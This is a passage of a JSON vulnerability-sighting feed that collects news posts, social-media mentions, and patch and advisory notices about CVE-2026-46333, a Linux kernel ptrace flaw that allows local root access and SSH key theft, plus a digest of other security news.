"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mme5n32ldx22", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path", "creation_timestamp": "2026-05-21T09:54:32.090306Z"}, {"uuid": "e1b5c119-4cc8-4f81-839e-f53ab737b742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html", "content": "Cybersecurity researchers have disclosed details of a vulnerability in the Linux kernel that remained undetected for nine years.\n\nThe vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case of improper privilege management that could permit an unprivileged local user to disclose sensitive files and execute arbitrary commands as root on default installations of several major", "creation_timestamp": "2026-05-21T05:35:53.000000Z"}, {"uuid": "3bb662a7-72d1-40e6-8cea-71f9b621bbcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmefcrbdn2y2", "content": "Nine-year-old Linux Kernel Vulnerability Let Attackers Exfiltrate SSH Private Keys A newly disclosed Linux kernel vulnerability, tracked as CVE-2026-46333, exposes a serious local privilege escalat...\n\n#Cyber #Security #News #Linux #Vulnerability #News [\u2026] \n\n[Original post on cybersecuritynews.com]", "creation_timestamp": "2026-05-21T12:12:01.204782Z"}, {"uuid": "d30cb28d-008b-483c-9f76-918f0524766e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/postac001.bsky.social/post/3mmefeedwn523", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e9\u5e74\u9593\u672a\u691c\u51fa\u306e\u8106\u5f31\u6027(CVE-2026-46333)\u306b\u3088\u308a\u3001\u7279\u6a29\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3067\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u53ef\u80fd\u3002", "creation_timestamp": "2026-05-21T12:12:49.850998Z"}, {"uuid": "15018486-524a-487f-a6e5-54b2ceb5deb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/appinn.bsky.social/post/3mmem7jjypv2y", "content": "\u8fd9\u662f\u4eca\u5929\uff082026\u5e745\u670821\u65e5\uff09\u65e9\u4e0a\uff1a \u8fd9\u662f\u4eca\u5929\u665a\u4e0a\uff1a \u4e5f\u4e0d\u77e5\u9053\u8bf4\u4ec0\u4e48\u4e86\uff0c\u76f4\u63a5\u770b\u5427\u3002 Linux \u7b2c4\u6f0f\u6d1e\uff1aCVE-2026-46333\uff087.1\u5206\uff09 \u8fd9\u662f\u7ee7 Copy Fail\uff084 \u6708 29 \u65e5\uff09\u3001Dirty Frag\uff085 \u6708 7 \u65e5\uff09\u548c Fragnesia\uff085 \u6708 13", "creation_timestamp": "2026-05-21T14:15:23.541269Z"}, {"uuid": "5449f6b7-7c45-4c96-8879-c9c56ee7a7e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mmeqcuniaju2", "content": "CVE-2026-46333: Linux Kernel Flaw Grants Root via ssh-keysign Qualys disclosed CVE-2026-46333, a nine-year-old Linux privilege escalation flaw that gives local users a reliable path to root on Debi...\n\n#Resources #CVE #Vulnerability #Alerts [\u2026] \n\n[Original post on dailysecurityreview.com]", "creation_timestamp": "2026-05-21T15:28:56.016260Z"}, {"uuid": "48617c39-e751-45fc-a44d-9c0d6bbf5547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmf5iibufo22", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-21T19:24:50.583323Z"}, {"uuid": "bc9c314a-7613-44c5-9f20-adf31ffac7af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://www.cert.dk/news/2026-05-22/Gammel-Linux-fejl-giver-lokal-root-adgang", "content": "", "creation_timestamp": "2026-05-22T00:22:03.000000Z"}, {"uuid": "bddba5ee-da6a-45e8-9b7d-e8a471fece22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/rspinternetgroup.bsky.social/post/3mmfrfk7r4c2t", "content": "\u3010\u304a\u77e5\u3089\u305b\u3011[RisuPu] Linux\u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308b\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8907\u6570\u306e\u8106\u5f31\u6027\uff08CVE-2026-46300\uff0fCVE-2026-46333\uff09\u306b\u95a2\u3059\u308b\u5bfe\u5fdc\u306b\u3064\u3044\u3066\nrspig.jp/notice/fragn...", "creation_timestamp": "2026-05-22T01:23:06.445224Z"}, {"uuid": "d4e9e752-7617-4963-a8c8-27f2cd709c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mmg56svosc2g", "content": "9-Year-Old Linux Kernel Flaw Enables Root Command Execution on Major Distros\n\nCybersecurity researchers have disclosed details of a vulnerability in the Linux kernel that remained undetected for nine years.\n\nThe vulnerability, tracked as CVE-2026-46333 (CVSS score: 5.5), is a case\u2026\n#hackernews #news", "creation_timestamp": "2026-05-22T04:51:53.303110Z"}, {"uuid": "c16c9851-4642-45ce-ad0f-723f9049da37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "Telegram/eGNnV304XEqDFAANRXhi1HE7X9MoKYAjwKK0DWUVMn_blw", "content": "", "creation_timestamp": "2026-05-21T12:29:26.000000Z"}, {"uuid": "7ecc3ac9-5c9b-4c22-8461-dcef919b9af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/raptor.infosec.exchange.ap.brid.gy/post/3mmexv3kq4ix2", "content": "#Qualys #Security #Advisory\n\nLogic bug in the #Linux kernel's __ptrace_may_access() function\n(CVE-2026-46333)\n\nhttps://cdn2.qualys.com/advisory/2026/05/20/cve-2026-46333-ptrace.txt", "creation_timestamp": "2026-05-21T17:44:28.337920Z"}, {"uuid": "eaba4af3-7c5c-4a3d-87b0-f002cea62e61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mmf2e4h5zo2u", "content": "CVE-2026-46333: Linux Kernel ptrace Race Condition Allows Local Information D...\n\nCVE-2026-46333 (ssh-keysign-pwn) is a Linux kernel race condition in ptrace's exit path. It allows unpr...\n\n\ud83d\udd17 https://ipsec.live/blog/2026-05-21-cve-2026-46333-linux-kernel-ptrace-race\n\n#infosec #cybersecurity", "creation_timestamp": "2026-05-21T18:28:29.531605Z"}, {"uuid": "96acc9fa-4b34-4c1d-a6ed-2af366c84517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmf2qo373kc2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-21T18:35:42.252793Z"}, {"uuid": "e18ecb53-36d2-4924-83ff-28f812ce2795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/calculito.bsky.social/post/3mmgxbdvqn32y", "content": "\ud83d\udd34 Qualys flagged a local logic flaw in the Linux kernel (CVE-2026-46333), potentially letting unprivileged users mess with memory access. Just another day in the world of cybersecurity where the gaps keep showing up. #LinuxFlaw #mikronews", "creation_timestamp": "2026-05-22T12:38:34.987597Z"}, {"uuid": "de9aadc5-04de-45c4-94f4-bf4578c2e864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmhh7sxp2sl2", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-22T17:24:04.939101Z"}, {"uuid": "2b162fd8-4a19-4c1c-a8b4-7c9dba2afd72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mmhkc55lud24", "content": "CVE-2026-46333 patches are live for AlmaLinux 8, 9 & 10. \n\nCommunity testing pushed them from testing \u2192 production faster than we could've managed alone. Get the patched kernels now if you haven't already! almalinux.org/blog/2026-05...", "creation_timestamp": "2026-05-22T18:19:06.339053Z"}, {"uuid": "42e8c844-00f2-49e7-a5f6-4dc69329dc9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mmhsvh2fts32", "content": "CVE-2026-46333: Local Root Privilege Escalation and Credential Disclosure in the Linux Kernel ptrace Path The Qualys Threat Research Unit (TRU) has discovered and published the full advisory for CV...\n\n#Vulnerabilities #and #Threat #Research #security #vulnerabilities\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-22T20:53:08.346831Z"}, {"uuid": "49349a61-e29e-42c3-9289-8148b341e1bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/insomnisec.bsky.social/post/3mmhvklxchw2i", "content": "\ud83d\udce1 DirtyDecrypt (CVE-2026-31635) and ssh-keysign-pwn (CVE-2026-46333): Sorting Out May's Linux LPE Pair", "creation_timestamp": "2026-05-22T21:40:37.752805Z"}, {"uuid": "0dda4a5f-ced9-4ee9-9940-c9522773b686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyqvvbua2x", "content": "\ud83d\udd17 CVE : CVE-2025-21999, CVE-2025-38024, CVE-2025-71238, CVE-2026-23191, CVE-2026-23243, CVE-2026-23401, CVE-2026-31419, CVE-2026-31532, CVE-2026-43284, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:12.537893Z"}, {"uuid": "50aa2c20-5133-44da-84a1-41dfec3ac142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.717283Z"}, {"uuid": "b07d2294-0a1f-46ea-8a3b-f9df1d489f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyri3mmq2x", "content": "\ud83d\udd17 CVE : CVE-2026-31499, CVE-2026-43088, CVE-2026-43109, CVE-2026-43220, CVE-2026-43490, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:30.987237Z"}, {"uuid": "e2fdd9a4-37f6-4df0-bdcd-37e0542fe4ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyzqwfpo2k", "content": "\ud83d\udd17 CVE : CVE-2026-46333", "creation_timestamp": "2026-05-22T13:10:07.643278Z"}, {"uuid": "14649b53-d0d3-4abb-bd5d-890b8b228260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jtyfc2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:36.053413Z"}, {"uuid": "0c2e7326-18d4-40ab-9636-e3f16b9ed2e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jub6k2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:36.602683Z"}, {"uuid": "c9f53249-6e69-4c92-8369-a0e107b59362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juc5s2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:37.242928Z"}, {"uuid": "e126ff6e-2417-4dae-a682-5c3eb258d378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jud522k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:37.904350Z"}, {"uuid": "e49736fa-bbd9-4fcc-b96d-e5cafa6eb3a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juf3k2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:38.455380Z"}, {"uuid": "86592e85-afc4-4fb0-95b2-266bbda16065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63jug2s2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:39.000503Z"}, {"uuid": "894f8ffc-9dad-4b15-8683-29edc968b14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juh222k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:39.539793Z"}, {"uuid": "33f2f4cd-7e44-4c9f-b2e6-b85aa188df92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juh232k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:40.110289Z"}, {"uuid": "d4a7e87d-c5cc-40bc-b2ab-236007e5803d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mmh63juhzd2k", "content": "4/ \u26a0\ufe0f CVE-2026-46333 (ssh-keysign-pwn): 9-year Linux kernel flaw dormant since Nov 2016. Unprivileged user \u2192 root access \u2192 steal SSH keys + /etc/shadow. PoC is public. Affects Debian, Fedora, Ubuntu. Update your kernel. Right now.", "creation_timestamp": "2026-05-22T14:40:40.709167Z"}, {"uuid": "144fd36a-2d07-4609-9fa0-f2ee6151d92d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmifqkvtg52v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45584: 64 interactions\nCVE-2026-45250: 63 interactions\nCVE-2026-46333: 28 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46333: 13 interactions\nCVE-2026-31431: 6 interactions\nCVE-2026-39821: 6 interactions\n", "creation_timestamp": "2026-05-23T02:31:25.478309Z"}, {"uuid": "c2a6fc06-a633-4364-abba-4d64f55ed0c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "Cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/mineabot.xyz/post/3mmhwngrmjb2s", "content": "Cve-2026-46333 details a logic bug found in the Linux kernel\u2019s __ptrace_may_access() function. This impacts debugging capabilities and could potentially allow privilege escalation. Patches are rolling out now; system administrators should review...\n\n#devops #linux #sre", "creation_timestamp": "2026-05-22T22:00:07.183710Z"}, {"uuid": "f51ced41-fc1f-4fc3-af16-96fe99a438f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://gist.github.com/ichintu/5cc436746984e120454764f225990464", "content": "**Key take\u2011aways**\n\n**Microsoft \u2013 Active Exploitation of Defender Vulnerabilities**  \n- CVE\u20112026\u201141091 & CVE\u20112026\u201145498 in the Defender ecosystem are being actively exploited.  \n- Both issues carry CVSS scores (exact values can be found in the article).  \n- Published\u202fMay\u202f22\u202f2026; full article includes a link, plus additional CVEs referenced:  \n  CVE\u20112026\u201120223, CVE\u20112026\u201145584, CVE\u20112026\u201145829, CVE\u20112026\u20115140, CVE\u20112026\u201133825, CVE\u20112010\u20110806, CVE\u20112010\u20110249, CVE\u20112009\u20113459, CVE\u20112009\u20111537, CVE\u20112008\u20114250.  \n\n**Microsoft \u2013 Temporary Script for Windows\u202fBitLocker Leak**  \n- Vulnerability allows a physically\u2011present attacker to read encrypted data.  \n- CVE\u20112026\u201145585.  \n- Microsoft released a script that blocks the data leak.  \n- Publication\u202fMay\u202f22\u202f2026 (approx. 2\u202fh\u202f19\u202fmin ago).  \n\n**Linux \u2013 Local Attackers Steal SSH Keys & Run Root Code**  \n- CVE\u20112026\u201146333 enables local attackers to exfiltrate SSH keys and execute code with root privileges.  \n- Patches and mitigations are available; administrators urged to deploy promptly.  \n- Published\u202fMay\u202f22\u202f2026 (\u2248\u202f2\u202fh\u202f40\u202fmin ago).  \n- CVE details at: https://cvefeed.io/vuln/detail/CVE-2026-46333  \n\n**Cisco Secure Workload \u2013 CVE\u20112026\u201120223**  \n- Critical flaw with a CVSS rating of 10.0; affects the Secure Workload platform.  \n- Cisco has issued a patch.  \n- Publication\u202fMay\u202f22\u202f2026.  \n- Related CVE\u20112026\u20115140 also mentioned.  \n\n**INJ3CTOR3 \u2013 Advanced FreePBX Attacks**  \n- Campaign uses the JOMANGY webshell; attributed with high confidence to threat actor INJ3CTOR.  \n- Publication\u202fMay\u202f22\u202f2026 (\u2248\u202f3\u202fh\u202f28\u202fmin ago).  \n- Highlights vulnerabilities exploited in the attacks.  \n\n**CVE\u20112026\u201125606 \u2013 SQL Injection in STER**  \n- Improper input sanitization in STER\u2019s search filters allows authenticated attackers to inject SQL and exfiltrate data.  \n- Severity: 8.7 (HIGH).  \n- Fixed in version\u202f9.5.  \n- Published\u202fMay\u202f22\u202f2026.  \n\n**AI Strategy in OT \u2013 Lessons from the Field**  \n- Legacy Windows\u202f7 laptops remain the sole link to industrial control systems, lacking patches or EDR.  \n- Dragos data: <10\u202f% of OT networks have meaningful monitoring; in 30\u202f% of incidents investigation begins with a floor\u2011level alert.  \n- AI fails when it never receives real OT telemetry; the CIA triangle is inverted\u2014availability is paramount.  \n- Passive network monitoring is essential; active polling risks crashing legacy controllers.  \n- Focus on \u201ccrown jewel\u201d processes (the three processes a plant cannot afford to lose for an hour) instead of blanket AI rollouts.  \n- Recommendations: inventory physical floor, segment the network, collect passive Level\u202f0\u20112 telemetry, then overlay AI.  \n\n**Kimwolf DDoS Botnet \u2013 Canadian Arrest**  \n- DOJ announced arrest of a Canadian citizen allegedly operating the Kimwolf DDoS botnet.  \n- Individual: Jacob Butler (aka \u201cDort\u201d), 23, Ottawa, Canada.  \n- Charged with developing and operating the botnet; Kimwolf identified as a variant of AISURU.", "creation_timestamp": "2026-05-22T12:00:42.000000Z"}, {"uuid": "35bc095e-ea5e-4f7a-ad78-9a266d50fd17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mml5xohpk572", "content": "Oracle Linux 9 Kernel Important ptrace Issue ELSA-2026-50280 CVE-2026-46333 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:\n\n#Oracle #Linux #Distribution #- #Security #Advisories\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-24T04:49:08.352050Z"}, {"uuid": "82b9eb77-81ac-41b2-af78-8282c99c3742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://mastodon.social/users/knoppix95/statuses/116628399794111630", "content": "Researchers disclosed CVE-2026-46333, a Linux kernel flaw present since 2016 that enables local users to access sensitive files and execute commands as root. \ud83d\udc27Qualys said Debian, Fedora and Ubuntu default installs are affected, while admins are urged to patch kernels and rotate exposed SSH keys. \ud83d\udd11\n\ud83d\udd17 https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html\n#TechNews #Linux #Kernel #CVE202646333 #CVE #Cybersecurity #Qualys #Ubuntu #Debian #Fedora #OpenSource #FOSS #Security #Exploit #Infosec #SysAdmin #Privacy #SSH #Admin", "creation_timestamp": "2026-05-24T07:38:02.535708Z"}, {"uuid": "c85b172e-cf15-4cdd-ba7c-7b4c34d2e645", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/technology-news.bsky.social/post/3mmiqk7l24s2m", "content": "CVE-2026-46333 is a nine-year Linux kernel improper privilege management flaw introduced in November 2016 with a CVSS score of 5.5.", "creation_timestamp": "2026-05-23T05:43:37.072611Z"}, {"uuid": "9705d66b-ac94-4c5f-b82f-48d790535860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-46338", "type": "published-proof-of-concept", "source": "https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-62q4-447f-wv8h", "content": "", "creation_timestamp": "2026-05-13T22:22:58.000000Z"}, {"uuid": "5469c4e6-46f0-4ee0-8a9c-22342b1e6658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-46333", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmjp7ulgujz2", "content": "\u0412 Linux \u0431\u0435\u0448\u0435 \u043e\u0442\u043a\u0440\u0438\u0442\u0430 \u043f\u043e\u0440\u0435\u0434\u043d\u0430\u0442\u0430 \u0441\u0435\u0440\u0438\u043e\u0437\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442 \u2013 \u0442\u044f \u0441\u044a\u0449\u0435\u0441\u0442\u0432\u0443\u0432\u0430 \u043e\u0442 \u0446\u0435\u043b\u0438 10 \u0433\u043e\u0434\u0438\u043d\u0438 \u0412 Linux \u0431\u0435\u0448\u0435 \u043e\u0442\u043a\u0440\u0438\u0442\u0430 \u043f\u043e\u0440\u0435\u0434\u043d\u0430 ...\n\n#IT #\u041d\u043e\u0432\u0438\u043d\u0438 #CVE-2026-46333 #Linux #\u043a\u0438\u0431\u0435\u0440\u0441\u0438\u0433\u0443\u0440\u043d\u043e\u0441\u0442 #\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430 #\u0441\u0438\u0441\u0442\u0435\u043c\u0430 #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-23T14:52:39.620858Z"}, {"uuid": 